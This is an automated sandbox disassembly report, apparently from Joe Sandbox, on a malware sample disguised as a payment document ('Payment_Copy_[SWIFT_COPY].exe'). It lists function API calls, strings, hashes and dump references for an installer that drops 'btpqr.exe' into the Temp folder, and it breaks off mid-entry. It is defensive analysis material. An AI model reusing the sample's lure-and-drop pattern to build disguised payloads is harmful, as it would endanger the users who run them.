                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\btpqr.exe" $(`_$N$dk_$open
                                                                                                                        • API String ID: 3615053054-3699470888
                                                                                                                        • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                                                                                        • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
                                                                                                                        • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                                                                                        • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401000 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 125COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                        • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                        • DrawTextA.USER32(00000000,pkfcbfzkpkrqtkjcmcyn Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                        • String ID: (`_$F$pkfcbfzkpkrqtkjcmcyn Setup
                                                                                                                        • API String ID: 941294808-2787602417
                                                                                                                        • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                                                                                        • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
                                                                                                                        • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                                                                                        • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405915 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                                                          • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
                                                                                                                        • GetShortPathNameA.KERNEL32(?,0042C230,00000400), ref: 0040596B
                                                                                                                        • GetShortPathNameA.KERNEL32(00000000,0042BCA8,00000400), ref: 00405988
                                                                                                                        • wsprintfA.USER32 ref: 004059A6
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405A65
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C
                                                                                                                          • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                                                          • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                                                        • String ID: %s=%s$(`_$[Rename]
                                                                                                                        • API String ID: 3445103937-3800591155
                                                                                                                        • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                                                        • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
                                                                                                                        • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                                                        • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405BE9 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 197stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
                                                                                                                        • GetSystemDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ,00000400), ref: 00405D0C
                                                                                                                        • GetWindowsDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ,00000400), ref: 00405D1F
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,0041BA19), ref: 00405D5B
                                                                                                                        • SHGetPathFromIDListA.SHELL32(0041BA19,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ), ref: 00405D69
                                                                                                                        • CoTaskMemFree.OLE32(0041BA19), ref: 00405D74
                                                                                                                        • lstrcatA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
                                                                                                                        • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\btpqr.exe" $Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$dk_
                                                                                                                        • API String ID: 900638850-1440456647
                                                                                                                        • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                                                        • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
                                                                                                                        • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                                                        • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405E29 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                                                        • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                        • String ID: "C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 589700163-2631913907
                                                                                                                        • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                                                        • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
                                                                                                                        • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                                                        • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403EEA Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowLongA.USER32(?,000000EB), ref: 00403F07
                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403F23
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403F2F
                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403F3B
                                                                                                                        • GetSysColor.USER32(?), ref: 00403F4E
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403F5E
                                                                                                                        • DeleteObject.GDI32(?), ref: 00403F78
                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403F82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2320649405-0
                                                                                                                        • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                                        • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
                                                                                                                        • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                                        • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004026AF Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00008A00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00402758
                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402771
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3294113728-0
                                                                                                                        • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                                                        • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
                                                                                                                        • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                                                        • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404EB3 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                                                        • lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                                                        • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041BA19,755723A0), ref: 00404F0F
                                                                                                                        • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2531174081-0
                                                                                                                        • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                                                                                        • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
                                                                                                                        • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                                                                                        • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404782 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040479D
                                                                                                                        • GetMessagePos.USER32 ref: 004047A5
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004047BF
                                                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047D1
                                                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047F7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                        • String ID: f
                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                        • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                                                        • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
                                                                                                                        • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                                                        • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402B6E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                                                                                        • MulDiv.KERNEL32(0005F641,00000064,0005F645), ref: 00402BB4
                                                                                                                        • wsprintfA.USER32 ref: 00402BC4
                                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                                                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                                                                                                                        Strings
                                                                                                                        • verifying installer: %d%%, xrefs: 00402BBE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                        • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                                                                                        • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
                                                                                                                        • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                                                                                        • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004038E3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowTextA.USER32(00000000,pkfcbfzkpkrqtkjcmcyn Setup), ref: 0040397B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
